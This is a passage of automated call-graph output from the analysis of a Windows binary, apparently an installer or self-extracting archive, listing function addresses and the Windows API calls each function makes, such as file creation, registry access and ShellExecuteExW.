7ff669ad6b68 31 API calls 2 library calls 25953->26011 25955->25910 25957 7ff669ab9d6c swprintf 46 API calls 25956->25957 25958 7ff669ab8823 25957->25958 25959 7ff669ac055c WideCharToMultiByte 25958->25959 25960 7ff669ab883b 25959->25960 25961 7ff669ab8a34 31 API calls 25960->25961 25962 7ff669ab8853 25961->25962 25963 7ff669ad1d90 _handle_error 8 API calls 25962->25963 25964 7ff669ab8863 25963->25964 25964->25914 25964->25923 26012 7ff669aa2380 GetClassNameW 25965->26012 25967 7ff669aa22f1 25968 7ff669aa1fa8 31 API calls 25967->25968 25969 7ff669aa2340 25968->25969 25970 7ff669ad1d90 _handle_error 8 API calls 25969->25970 25971 7ff669aa2350 25970->25971 25971->25928 25973 7ff669ad94f2 25972->25973 25974 7ff669ad94da 25972->25974 25973->25974 25975 7ff669ad94fc 25973->25975 25999 7ff669adc5dc 15 API calls _set_fmode 25974->25999 26001 7ff669ad7494 35 API calls 2 library calls 25975->26001 25978 7ff669ad94df 26000 7ff669ad6834 31 API calls _invalid_parameter_noinfo 25978->26000 25980 7ff669ad1d90 _handle_error 8 API calls 25982 7ff669ab9713 25980->25982 25981 7ff669ad950d __scrt_get_show_window_mode 26002 7ff669ad7414 15 API calls _set_fmode 25981->26002 25982->25935 25984 7ff669ad9578 26003 7ff669ad789c 46 API calls 3 library calls 25984->26003 25986 7ff669ad9581 25987 7ff669ad9589 25986->25987 25988 7ff669ad95b8 25986->25988 26004 7ff669adc7d8 25987->26004 25990 7ff669ad9610 25988->25990 25991 7ff669ad95c7 25988->25991 25992 7ff669ad9636 25988->25992 25995 7ff669ad95be 25988->25995 25996 7ff669adc7d8 __free_lconv_num 15 API calls 25990->25996 25994 7ff669adc7d8 __free_lconv_num 15 API calls 25991->25994 25992->25990 25993 7ff669ad9640 25992->25993 25997 7ff669adc7d8 __free_lconv_num 15 API calls 25993->25997 25998 7ff669ad94ea 25994->25998 25995->25990 25995->25991 25996->25998 25997->25998 25998->25980 25999->25978 26000->25998 26001->25981 26002->25984 26003->25986 26005 7ff669adc7dd RtlFreeHeap 26004->26005 26009 7ff669adc80d __free_lconv_num 26004->26009 26006 7ff669adc7f8 26005->26006 26005->26009 26010 7ff669adc5dc 15 API calls _set_fmode 26006->26010 26008 7ff669adc7fd GetLastError 26008->26009 26009->25998 26010->26008 26011->25955 26013 7ff669aa23e8 26012->26013 26014 7ff669aa12c0 33 API calls 26013->26014 26015 7ff669aa23f6 26014->26015 26016 7ff669ad1d90 _handle_error 8 API calls 26015->26016 26017 7ff669aa2409 26016->26017 26017->25967 26021 7ff669ad1c4b 26018->26021 26019 7ff669ad1c64 26019->25568 26021->26019 26022 7ff669ad1c6a 26021->26022 26029 7ff669adab00 26021->26029 26023 7ff669ad1c75 26022->26023 26032 7ff669ad289c RtlPcToFileHeader RaiseException _com_raise_error std::bad_alloc::bad_alloc 26022->26032 26033 7ff669aa1f88 RtlPcToFileHeader RaiseException _com_raise_error std::bad_alloc::bad_alloc 26023->26033 26034 7ff669adab40 26029->26034 26032->26023 26039 7ff669ade2d8 EnterCriticalSection 26034->26039 26043 7ff669aa3cac 26040->26043 26042 7ff669acc938 RegCreateKeyExW 26042->25577 26042->25578 26044 7ff669aa3cc3 26043->26044 26046 7ff669aa3cda BuildCatchObjectHelperInternal 26043->26046 26044->26046 26047 7ff669aa1490 33 API calls 3 library calls 26044->26047 26046->26042 26047->26046 26050 7ff669ab2a5f 26048->26050 26049 7ff669ab2a8c 26068 7ff669ab2680 26049->26068 26050->26049 26051 7ff669ab2a78 CreateDirectoryW 26050->26051 26051->26049 26053 7ff669ab2b2c 26051->26053 26055 7ff669ab2b3c 26053->26055 26155 7ff669ab3108 26053->26155 26059 7ff669ad1d90 _handle_error 8 API calls 26055->26059 26056 7ff669ab2b40 GetLastError 26056->26055 26061 7ff669ab2b68 26059->26061 26061->25584 26062 7ff669ab2acf CreateDirectoryW 26063 7ff669ab2aea 26062->26063 26064 7ff669ab2b23 26063->26064 26065 7ff669ab2b7d 26063->26065 26064->26053 26064->26056 26066 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 26065->26066 26067 7ff669ab2b82 26066->26067 26069 7ff669ab26a8 26068->26069 26070 7ff669ab26ab GetFileAttributesW 26068->26070 26069->26070 26071 7ff669ab26bc 26070->26071 26078 7ff669ab273c 26070->26078 26073 7ff669ab5d18 49 API calls 26071->26073 26072 7ff669ad1d90 _handle_error 8 API calls 26074 7ff669ab2750 26072->26074 26075 7ff669ab26e6 26073->26075 26074->26056 26082 7ff669ab5d18 26074->26082 26076 7ff669ab2703 26075->26076 26077 7ff669ab26ea GetFileAttributesW 26075->26077 26076->26078 26079 7ff669ab2760 26076->26079 26077->26076 26078->26072 26080 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 26079->26080 26081 7ff669ab2765 26080->26081 26083 7ff669ab5d57 26082->26083 26098 7ff669ab5d50 26082->26098 26085 7ff669aa12c0 33 API calls 26083->26085 26084 7ff669ad1d90 _handle_error 8 API calls 26086 7ff669ab2acb 26084->26086 26087 7ff669ab5d89 26085->26087 26086->26062 26086->26063 26088 7ff669ab5da9 26087->26088 26089 7ff669ab5fda 26087->26089 26091 7ff669ab5dc3 26088->26091 26113 7ff669ab5e60 26088->26113 26090 7ff669ab55f8 35 API calls 26089->26090 26092 7ff669ab5ffc 26090->26092 26093 7ff669ab63bb 26091->26093 26169 7ff669aa2af0 4 API calls 2 library calls 26091->26169 26094 7ff669ab61fd 26092->26094 26096 7ff669ab6030 26092->26096 26152 7ff669ab5e5b 26092->26152 26190 7ff669aa200c 33 API calls std::_Xinvalid_argument 26093->26190 26100 7ff669ab63df 26094->26100 26187 7ff669aa2af0 4 API calls 2 library calls 26094->26187 26102 7ff669ab63cd 26096->26102 26172 7ff669aa2af0 4 API calls 2 library calls 26096->26172 26097 7ff669ab63c1 26110 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 26097->26110 26098->26084 26193 7ff669aa200c 33 API calls std::_Xinvalid_argument 26100->26193 26191 7ff669aa200c 33 API calls std::_Xinvalid_argument 26102->26191 26103 7ff669ab63e5 26111 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 26103->26111 26105 7ff669ab5e1e 26114 7ff669aa1fa8 31 API calls 26105->26114 26121 7ff669ab5e2f BuildCatchObjectHelperInternal 26105->26121 26106 7ff669ab63b6 26118 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 26106->26118 26107 7ff669ab6267 26188 7ff669aa11ec 33 API calls BuildCatchObjectHelperInternal 26107->26188 26119 7ff669ab63c7 26110->26119 26112 7ff669ab63eb 26111->26112 26125 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 26112->26125 26120 7ff669aa12c0 33 API calls 26113->26120 26113->26152 26114->26121 26116 7ff669ab63d3 26128 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 26116->26128 26117 7ff669aa1fa8 31 API calls 26117->26152 26118->26093 26123 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 26119->26123 26126 7ff669ab5eda 26120->26126 26121->26117 26122 7ff669ab627a 26189 7ff669ab4b34 33 API calls BuildCatchObjectHelperInternal 26122->26189 26123->26102 26124 7ff669aa1fa8 31 API calls 26138 7ff669ab6107 26124->26138 26129 7ff669ab63f1 26125->26129 26170 7ff669ab4ba8 33 API calls 26126->26170 26131 7ff669ab63d9 26128->26131 26192 7ff669aa6ddc 47 API calls BuildCatchObjectHelperInternal 26131->26192 26132 7ff669ab608d BuildCatchObjectHelperInternal 26132->26116 26132->26124 26133 7ff669ab5ef0 26171 7ff669aad5bc 33 API calls 2 library calls 26133->26171 26134 7ff669aa1fa8 31 API calls 26137 7ff669ab62fc 26134->26137 26140 7ff669aa1fa8 31 API calls 26137->26140 26143 7ff669ab6132 26138->26143 26173 7ff669aa1754 26138->26173 26139 7ff669ab628a BuildCatchObjectHelperInternal 26139->26112 26139->26134 26142 7ff669ab6306 26140->26142 26141 7ff669aa1fa8 31 API calls 26145 7ff669ab5f80 26141->26145 26146 7ff669aa1fa8 31 API calls 26142->26146 26143->26131 26147 7ff669aa12c0 33 API calls 26143->26147 26149 7ff669aa1fa8 31 API calls 26145->26149 26146->26152 26150 7ff669ab61d0 26147->26150 26148 7ff669ab5f06 BuildCatchObjectHelperInternal 26148->26119 26148->26141 26149->26152 26186 7ff669aa2044 33 API calls BuildCatchObjectHelperInternal 26150->26186 26152->26097 26152->26098 26152->26103 26152->26106 26153 7ff669ab61ed 26154 7ff669aa1fa8 31 API calls 26153->26154 26154->26152 26156 7ff669ab312f 26155->26156 26157 7ff669ab3132 SetFileAttributesW 26155->26157 26156->26157 26158 7ff669ab31cc 26157->26158 26159 7ff669ab3148 26157->26159 26161 7ff669ad1d90 _handle_error 8 API calls 26158->26161 26160 7ff669ab5d18 49 API calls 26159->26160 26163 7ff669ab3170 26160->26163 26162 7ff669ab31e1 26161->26162 26162->26055 26164 7ff669ab3174 SetFileAttributesW 26163->26164 26165 7ff669ab3193 26163->26165 26164->26165 26165->26158 26166 7ff669ab31f1 26165->26166 26167 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 26166->26167 26168 7ff669ab31f6 26167->26168 26169->26105 26170->26133 26171->26148 26172->26132 26174 7ff669aa18ac 26173->26174 26177 7ff669aa1794 26173->26177 26194 7ff669aa200c 33 API calls std::_Xinvalid_argument 26174->26194 26176 7ff669aa18b2 26195 7ff669aa1f88 RtlPcToFileHeader RaiseException _com_raise_error std::bad_alloc::bad_alloc 26176->26195 26177->26176 26178 7ff669ad1c40 4 API calls 26177->26178 26183 7ff669aa17d3 BuildCatchObjectHelperInternal 26177->26183 26178->26183 26184 7ff669aa1864 BuildCatchObjectHelperInternal 26183->26184 26185 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 26183->26185 26184->26143 26185->26174 26186->26153 26187->26107 26188->26122 26189->26139 26192->26100 26197 7ff669ab1502 26196->26197 26198 7ff669ab14ea 26196->26198 26199 7ff669ab1526 26197->26199 26202 7ff669aaaca4 96 API calls 26197->26202 26198->26197 26200 7ff669ab14f6 CloseHandle 26198->26200 26199->25627 26200->26197 26202->26199 26213 7ff669ab89a8 26203->26213 26206 7ff669aba284 LoadStringW 26207 7ff669aba2b2 26206->26207 26208 7ff669aba29d LoadStringW 26206->26208 26207->25641 26208->26207 26209->25641 26211->25641 26220 7ff669ab8870 26213->26220 26216 7ff669ab8a34 31 API calls 26217 7ff669ab8a0d 26216->26217 26218 7ff669ad1d90 _handle_error 8 API calls 26217->26218 26219 7ff669ab8a26 26218->26219 26219->26206 26219->26207 26221 7ff669ab88c7 26220->26221 26229 7ff669ab8965 26220->26229 26222 7ff669ab88f5 26221->26222 26223 7ff669ac055c WideCharToMultiByte 26221->26223 26226 7ff669ab8924 26222->26226 26230 7ff669ab9d14 45 API calls 2 library calls 26222->26230 26223->26222 26224 7ff669ad1d90 _handle_error 8 API calls 26225 7ff669ab8999 26224->26225 26225->26216 26225->26217 26231 7ff669ad6b68 31 API calls 2 library calls 26226->26231 26229->26224 26230->26226 26231->26229 26233 7ff669aca30b 26232->26233 26234 7ff669aca312 26232->26234 26233->25744 26234->26233 26235 7ff669aa1754 33 API calls 26234->26235 26235->26234 26237 7ff669ac9d6c 26236->26237 26259 7ff669ac9fdb 26236->26259 26238 7ff669acc924 33 API calls 26237->26238 26240 7ff669ac9d8e 26238->26240 26239 7ff669ad1d90 _handle_error 8 API calls 26241 7ff669ac9fec 26239->26241 26242 7ff669aa12c0 33 API calls 26240->26242 26241->25717 26243 7ff669ac9dd1 26242->26243 26244 7ff669aa12c0 33 API calls 26243->26244 26245 7ff669ac9e0c 26244->26245 26246 7ff669aa12c0 33 API calls 26245->26246 26247 7ff669ac9e42 26246->26247 26248 7ff669aca134 35 API calls 26247->26248 26249 7ff669ac9e68 26248->26249 26251 7ff669aca019 26249->26251 26252 7ff669aca01f 26249->26252 26253 7ff669aa3cac 33 API calls 26249->26253 26256 7ff669ac9f60 26249->26256 26264 7ff669aca013 26249->26264 26250 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 26250->26251 26254 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 26251->26254 26255 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 26252->26255 26253->26256 26254->26252 26257 7ff669aca025 26255->26257 26256->26257 26258 7ff669aca00e 26256->26258 26256->26259 26260 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 26257->26260 26262 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 26258->26262 26259->26239 26261 7ff669aca02b 26260->26261 26263 7ff669aa26c8 63 API calls 26261->26263 26262->26264 26265 7ff669aca07f 26263->26265 26264->26250 26266 7ff669aca083 26265->26266 26267 7ff669aca102 SetDlgItemTextW 26265->26267 26268 7ff669aca095 26265->26268 26269 7ff669ad1d90 _handle_error 8 API calls 26266->26269 26267->26266 26268->26266 26271 7ff669aca0a1 26268->26271 26272 7ff669aca0b6 26268->26272 26270 7ff669aca128 26269->26270 26270->25717 26271->26266 26273 7ff669aca0a9 EndDialog 26271->26273 26397 7ff669abb444 99 API calls 26272->26397 26273->26266 26275 7ff669aca0e2 26276 7ff669aca0ee EndDialog 26275->26276 26276->26266 26283 7ff669aced91 __scrt_get_show_window_mode 26277->26283 26293 7ff669acf0df 26277->26293 26278 7ff669aa1fa8 31 API calls 26279 7ff669acf0fe 26278->26279 26280 7ff669ad1d90 _handle_error 8 API calls 26279->26280 26281 7ff669acf10a 26280->26281 26281->25744 26282 7ff669aceeeb 26285 7ff669aa12c0 33 API calls 26282->26285 26283->26282 26398 7ff669ac0ad8 CompareStringW 26283->26398 26286 7ff669acef2a 26285->26286 26287 7ff669ab266c 51 API calls 26286->26287 26288 7ff669acef34 26287->26288 26289 7ff669aa1fa8 31 API calls 26288->26289 26292 7ff669acef3f 26289->26292 26290 7ff669acefaf ShellExecuteExW 26291 7ff669acf0a8 26290->26291 26299 7ff669acefc2 26290->26299 26291->26293 26297 7ff669acf15d 26291->26297 26292->26290 26295 7ff669aa12c0 33 API calls 26292->26295 26293->26278 26294 7ff669aceffb 26400 7ff669acf658 PeekMessageW GetMessageW TranslateMessage DispatchMessageW WaitForSingleObject 26294->26400 26296 7ff669acef84 26295->26296 26399 7ff669ab4ee4 53 API calls 2 library calls 26296->26399 26301 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 26297->26301 26298 7ff669acf04d CloseHandle 26302 7ff669acf06b 26298->26302 26303 7ff669acf05c 26298->26303 26299->26294 26299->26298 26308 7ff669acefee ShowWindow 26299->26308 26306 7ff669acf162 26301->26306 26302->26291 26311 7ff669acf099 ShowWindow 26302->26311 26401 7ff669ac0ad8 CompareStringW 26303->26401 26305 7ff669acef92 26310 7ff669aa1fa8 31 API calls 26305->26310 26308->26294 26309 7ff669acf013 26309->26298 26313 7ff669acf021 GetExitCodeProcess 26309->26313 26312 7ff669acef9c 26310->26312 26311->26291 26312->26290 26313->26298 26314 7ff669acf034 26313->26314 26314->26298 26316->25744 26317->25744 26318->25744 26319->25744 26321 7ff669aca162 26320->26321 26322 7ff669aca165 RegOpenKeyExW 26320->26322 26321->26322 26323 7ff669aca2b6 26322->26323 26326 7ff669aca189 26322->26326 26324 7ff669aa3cac 33 API calls 26323->26324 26325 7ff669aca2c1 26324->26325 26325->25744 26327 7ff669aca2a7 RegCloseKey 26326->26327 26328 7ff669aa13c4 33 API calls 26326->26328 26327->26323 26327->26325 26329 7ff669aca1f1 26328->26329 26330 7ff669aca268 26329->26330 26331 7ff669aca244 26329->26331 26402 7ff669ac8fc0 33 API calls 2 library calls 26329->26402 26330->26327 26332 7ff669aca2a2 26330->26332 26334 7ff669aca2de 26330->26334 26335 7ff669aa20c0 33 API calls 26331->26335 26332->26327 26336 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 26334->26336 26335->26330 26337 7ff669aca2e3 26336->26337 26338->25744 26339->25744 26340->25744 26341->25744 26343 7ff669ab65ee 26342->26343 26403 7ff669aaab08 26343->26403 26347 7ff669ab25a4 26346->26347 26348 7ff669ab25a7 DeleteFileW 26346->26348 26347->26348 26349 7ff669ab25bd 26348->26349 26356 7ff669ab263f 26348->26356 26351 7ff669ab5d18 49 API calls 26349->26351 26350 7ff669ad1d90 _handle_error 8 API calls 26352 7ff669ab2654 26350->26352 26353 7ff669ab25e5 26351->26353 26352->25744 26354 7ff669ab25e9 DeleteFileW 26353->26354 26355 7ff669ab2606 26353->26355 26354->26355 26355->26356 26357 7ff669ab2664 26355->26357 26356->26350 26358 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 26357->26358 26359 7ff669ab2669 26358->26359 26360->25744 26363 7ff669aa144a GetTempPathW 26362->26363 26364 7ff669aa13cd 26362->26364 26363->25744 26365 7ff669aa13ee 26364->26365 26366 7ff669aa145a 26364->26366 26369 7ff669aa13f7 __scrt_get_show_window_mode 26365->26369 26370 7ff669ad1c40 4 API calls 26365->26370 26408 7ff669aa2020 33 API calls std::_Xinvalid_argument 26366->26408 26407 7ff669aa1988 31 API calls _invalid_parameter_noinfo_noreturn 26369->26407 26370->26369 26372->25744 26373->25744 26374->25744 26375->25744 26377 7ff669ab70c8 26376->26377 26378 7ff669ab70e1 26377->26378 26379 7ff669ab7113 26377->26379 26381 7ff669aa12c0 33 API calls 26378->26381 26409 7ff669aa6ddc 47 API calls BuildCatchObjectHelperInternal 26379->26409 26383 7ff669ab7105 26381->26383 26382 7ff669ab7118 26383->25744 26384->25744 26385->25744 26386->25678 26389->25652 26390->25655 26391->25663 26392->25702 26397->26275 26398->26282 26399->26305 26400->26309 26401->26302 26402->26331 26406 7ff669aaab52 __scrt_get_show_window_mode 26403->26406 26404 7ff669ad1d90 _handle_error 8 API calls 26405 7ff669aaabe9 26404->26405 26405->25744 26406->26404 26407->26363 26409->26382 26411 7ff669abd34a 26410->26411 26452 7ff669aa2164 26411->26452 26413 7ff669abd35e wcscpy 26413->25760 26415 7ff669abd308 26414->26415 26416 7ff669aa2164 33 API calls 26415->26416 26417 7ff669abd35e wcscpy 26416->26417 26417->25764 26457 7ff669ab793c 26418->26457 26420 7ff669aad823 26467 7ff669aada84 31 API calls BuildCatchObjectHelperInternal 26420->26467 26422 7ff669aad940 26425 7ff669ad1c40 4 API calls 26422->26425 26423 7ff669aad9cc 26426 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 26423->26426 26424 7ff669aad8be 26424->26422 26424->26423 26427 7ff669aad95c 26425->26427 26435 7ff669aad9d1 26426->26435 26468 7ff669ac295c 99 API calls 26427->26468 26429 7ff669aad989 26431 7ff669ad1d90 _handle_error 8 API calls 26429->26431 26430 7ff669ab0cce 26433 7ff669ab0d19 26430->26433 26436 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 26430->26436 26434 7ff669aad9b0 26431->26434 26432 7ff669aa1fa8 31 API calls 26432->26435 26433->25766 26434->25766 26435->26430 26435->26432 26435->26433 26437 7ff669ab0d47 26436->26437 26441 7ff669aadc8a 26438->26441 26439 7ff669aadd07 26442 7ff669aade3d 26439->26442 26443 7ff669aadd44 26439->26443 26441->26439 26441->26443 26484 7ff669ab3244 26441->26484 26444 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 26442->26444 26445 7ff669aaddaa 26443->26445 26491 7ff669aaea34 26443->26491 26448 7ff669aade42 26444->26448 26450 7ff669aaddff 26445->26450 26527 7ff669aa32fc 79 API calls 2 library calls 26445->26527 26447 7ff669ad1d90 _handle_error 8 API calls 26449 7ff669aade28 26447->26449 26449->25768 26450->26447 26453 7ff669aa2191 26452->26453 26454 7ff669aa218b __scrt_get_show_window_mode 26452->26454 26453->26454 26456 7ff669aa21d8 33 API calls 4 library calls 26453->26456 26454->26413 26456->26454 26458 7ff669ab795a 26457->26458 26459 7ff669ad1c40 4 API calls 26458->26459 26460 7ff669ab797f 26459->26460 26461 7ff669ab7993 26460->26461 26469 7ff669aa9a54 26460->26469 26463 7ff669ad1c40 4 API calls 26461->26463 26464 7ff669ab79a9 26463->26464 26465 7ff669ab79bb 26464->26465 26466 7ff669aa9a54 33 API calls 26464->26466 26465->26420 26466->26465 26467->26424 26468->26429 26474 7ff669ad1f10 26469->26474 26472 7ff669ad1f10 33 API calls 26473 7ff669aa9aad __scrt_get_show_window_mode 26472->26473 26473->26461 26476 7ff669ad1f41 26474->26476 26475 7ff669aa9a82 26475->26472 26476->26475 26478 7ff669aa9af0 26476->26478 26481 7ff669abb0d0 26478->26481 26480 7ff669aa9b02 26480->26476 26482 7ff669aa13c4 33 API calls 26481->26482 26483 7ff669abb0f5 26482->26483 26483->26480 26485 7ff669ab65d0 8 API calls 26484->26485 26486 7ff669ab325d 26485->26486 26487 7ff669ab328b 26486->26487 26528 7ff669ab341c 26486->26528 26487->26441 26490 7ff669ab3276 FindClose 26490->26487 26492 7ff669aaea59 _snwprintf 26491->26492 26567 7ff669aa33a8 26492->26567 26495 7ff669aaea8d 26498 7ff669aaecdf 26495->26498 26584 7ff669aa3ef4 26495->26584 26806 7ff669aa36e0 26498->26806 26499 7ff669aaeab9 26499->26498 26616 7ff669aa45c4 26499->26616 26506 7ff669aa8a94 33 API calls 26508 7ff669aaeb19 26506->26508 26822 7ff669ab6be4 48 API calls 2 library calls 26508->26822 26511 7ff669aaecbe 26511->26498 26632 7ff669aa6754 26511->26632 26640 7ff669aaedf8 26511->26640 26512 7ff669aaeb2e 26513 7ff669ab3244 55 API calls 26512->26513 26518 7ff669aaeb63 26513->26518 26517 7ff669aaec01 26520 7ff669aaed1b 26517->26520 26521 7ff669aaec7d 26517->26521 26523 7ff669aaed16 26517->26523 26518->26517 26518->26520 26522 7ff669ab3244 55 API calls 26518->26522 26823 7ff669ab6be4 48 API calls 2 library calls 26518->26823 26524 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 26520->26524 26626 7ff669aaed24 26521->26626 26522->26518 26525 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 26523->26525 26526 7ff669aaed21 26524->26526 26525->26520 26527->26450 26529 7ff669ab3535 FindNextFileW 26528->26529 26530 7ff669ab3459 FindFirstFileW 26528->26530 26532 7ff669ab3544 GetLastError 26529->26532 26533 7ff669ab3556 26529->26533 26530->26533 26535 7ff669ab347e 26530->26535 26553 7ff669ab3523 26532->26553 26534 7ff669aa3cac 33 API calls 26533->26534 26537 7ff669ab3561 26534->26537 26536 7ff669ab5d18 49 API calls 26535->26536 26538 7ff669ab34a7 26536->26538 26543 7ff669aa12c0 33 API calls 26537->26543 26540 7ff669ab34ca 26538->26540 26541 7ff669ab34ab FindFirstFileW 26538->26541 26539 7ff669ad1d90 _handle_error 8 API calls 26542 7ff669ab3270 26539->26542 26540->26533 26545 7ff669ab3512 GetLastError 26540->26545 26546 7ff669ab3667 26540->26546 26541->26540 26542->26487 26542->26490 26544 7ff669ab358e 26543->26544 26554 7ff669ab7334 26544->26554 26545->26553 26549 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 26546->26549 26550 7ff669ab366d 26549->26550 26551 7ff669ab3662 26552 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 26551->26552 26552->26546 26553->26539 26555 7ff669ab7349 26554->26555 26558 7ff669ab7438 26555->26558 26557 7ff669ab359c 26557->26551 26557->26553 26559 7ff669ab75e5 26558->26559 26562 7ff669ab746a 26558->26562 26566 7ff669aa6ddc 47 API calls BuildCatchObjectHelperInternal 26559->26566 26561 7ff669ab75ea 26564 7ff669ab7484 BuildCatchObjectHelperInternal 26562->26564 26565 7ff669ab4c2c 33 API calls 2 library calls 26562->26565 26564->26557 26565->26564 26566->26561 26568 7ff669aa33c4 26567->26568 26569 7ff669aa9a54 33 API calls 26568->26569 26570 7ff669aa33d8 26569->26570 26571 7ff669ab793c 33 API calls 26570->26571 26572 7ff669aa33e5 26571->26572 26573 7ff669aa3544 26572->26573 26574 7ff669ad1c40 4 API calls 26572->26574 26832 7ff669ab4064 26573->26832 26576 7ff669aa3532 26574->26576 26576->26573 26825 7ff669aa8cfc 26576->26825 26579 7ff669ab2058 26861 7ff669ab1890 26579->26861 26581 7ff669ab2075 26581->26495 26880 7ff669ab1c80 26584->26880 26585 7ff669aa3f41 __scrt_get_show_window_mode 26593 7ff669aa3f5e 26585->26593 26596 7ff669aa4111 26585->26596 26885 7ff669ab1f60 26585->26885 26586 7ff669aa4184 26899 7ff669aa32fc 79 API calls 2 library calls 26586->26899 26588 7ff669aa6754 116 API calls 26590 7ff669aa4192 26588->26590 26590->26588 26591 7ff669aa421e 26590->26591 26590->26596 26608 7ff669ab1e50 98 API calls 26590->26608 26591->26596 26600 7ff669aa4254 26591->26600 26900 7ff669aa32fc 79 API calls 2 library calls 26591->26900 26593->26586 26593->26590 26594 7ff669aa408d 26594->26593 26597 7ff669aa40e7 26594->26597 26595 7ff669aa4361 26595->26596 26598 7ff669aa3cac 33 API calls 26595->26598 26596->26499 26597->26596 26599 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 26597->26599 26598->26596 26601 7ff669aa438f 26599->26601 26600->26595 26600->26596 26610 7ff669ab1f60 98 API calls 26600->26610 26601->26499 26602 7ff669aa3ffb 26602->26594 26894 7ff669ab1e50 26602->26894 26604 7ff669aa6754 116 API calls 26605 7ff669aa42a2 26604->26605 26605->26604 26606 7ff669aa4317 26605->26606 26609 7ff669ab1e50 98 API calls 26605->26609 26613 7ff669ab1e50 98 API calls 26606->26613 26607 7ff669ab1c80 101 API calls 26607->26594 26608->26590 26609->26605 26610->26605 26613->26595 26615 7ff669ab1c80 101 API calls 26615->26602 26617 7ff669aa45e5 26616->26617 26618 7ff669aa4644 26616->26618 26912 7ff669aa3e88 26617->26912 26619 7ff669ad1d90 _handle_error 8 API calls 26618->26619 26621 7ff669aa4656 26619->26621 26621->26506 26621->26521 26623 7ff669aa465b 26624 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 26623->26624 26625 7ff669aa4660 26624->26625 26627 7ff669aaed4f 26626->26627 27130 7ff669ab7abc 26627->27130 26629 7ff669aaed7e 27134 7ff669abe6d0 GetSystemTime SystemTimeToFileTime 26629->27134 26633 7ff669aa6766 26632->26633 26634 7ff669aa676a 26632->26634 26633->26511 26639 7ff669ab1f60 98 API calls 26634->26639 26635 7ff669aa6777 26635->26633 27143 7ff669aa5b70 26635->27143 26637 7ff669aa6791 26637->26633 27222 7ff669aa5124 79 API calls 26637->27222 26639->26635 26642 7ff669aaee44 26640->26642 26641 7ff669aaee78 26643 7ff669ab05a2 26641->26643 26651 7ff669aaee8f 26641->26651 26697 7ff669aaeef1 26641->26697 26642->26641 26642->26697 27341 7ff669ac59cc 121 API calls 3 library calls 26642->27341 26645 7ff669ab05a7 26643->26645 26646 7ff669ab05fa 26643->26646 26645->26697 27391 7ff669aad224 163 API calls 26645->27391 26646->26697 27392 7ff669ac59cc 121 API calls 3 library calls 26646->27392 26647 7ff669ad1d90 _handle_error 8 API calls 26648 7ff669ab05dd 26647->26648 26648->26511 26651->26697 27260 7ff669aa96dc 26651->27260 26653 7ff669aaef95 27275 7ff669ab523c 26653->27275 26656 7ff669aaf038 26697->26647 26807 7ff669aa3700 26806->26807 26810 7ff669aa3714 26806->26810 26807->26810 27441 7ff669aa380c 31 API calls _invalid_parameter_noinfo_noreturn 26807->27441 26808 7ff669aa1fa8 31 API calls 26813 7ff669aa372d 26808->26813 26810->26808 26812 7ff669aa3794 27434 7ff669aa3b1c 31 API calls _invalid_parameter_noinfo_noreturn 26812->27434 26821 7ff669aa37b8 26813->26821 27433 7ff669aa3b1c 31 API calls _invalid_parameter_noinfo_noreturn 26813->27433 26815 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 26816 7ff669aa3808 26815->26816 26817 7ff669aa37a0 26818 7ff669aa1fa8 31 API calls 26817->26818 26819 7ff669aa37ac 26818->26819 27435 7ff669ab79dc 26819->27435 26821->26815 26822->26512 26823->26518 26824 7ff669abff98 91 API calls _handle_error 26824->26511 26842 7ff669ab4a2c 26825->26842 26827 7ff669aa8d13 26828 7ff669abb0d0 33 API calls 26827->26828 26829 7ff669aa8e9c 26828->26829 26845 7ff669aa9554 26829->26845 26831 7ff669aa8eba 26831->26573 26833 7ff669ab4092 __scrt_get_show_window_mode 26832->26833 26857 7ff669ab3f0c 26833->26857 26835 7ff669ab40c7 26837 7ff669ab4121 26835->26837 26838 7ff669ab4103 26835->26838 26836 7ff669ad1d90 _handle_error 8 API calls 26839 7ff669aa35be 26836->26839 26840 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 26837->26840 26838->26836 26839->26495 26839->26579 26841 7ff669ab4126 26840->26841 26848 7ff669ab4a70 26842->26848 26846 7ff669ab4a70 2 API calls 26845->26846 26847 7ff669aa9562 26846->26847 26847->26831 26849 7ff669ab4a86 __scrt_get_show_window_mode 26848->26849 26852 7ff669abe50c 26849->26852 26855 7ff669abe4c0 GetCurrentProcess GetProcessAffinityMask 26852->26855 26856 7ff669ab4a66 26855->26856 26856->26827 26858 7ff669ab3f87 26857->26858 26860 7ff669ab3f8f BuildCatchObjectHelperInternal 26857->26860 26859 7ff669aa1fa8 31 API calls 26858->26859 26859->26860 26860->26835 26862 7ff669ab18cd CreateFileW 26861->26862 26864 7ff669ab1981 GetLastError 26862->26864 26873 7ff669ab1a43 26862->26873 26865 7ff669ab5d18 49 API calls 26864->26865 26866 7ff669ab19b1 26865->26866 26867 7ff669ab19b5 CreateFileW GetLastError 26866->26867 26874 7ff669ab1a01 26866->26874 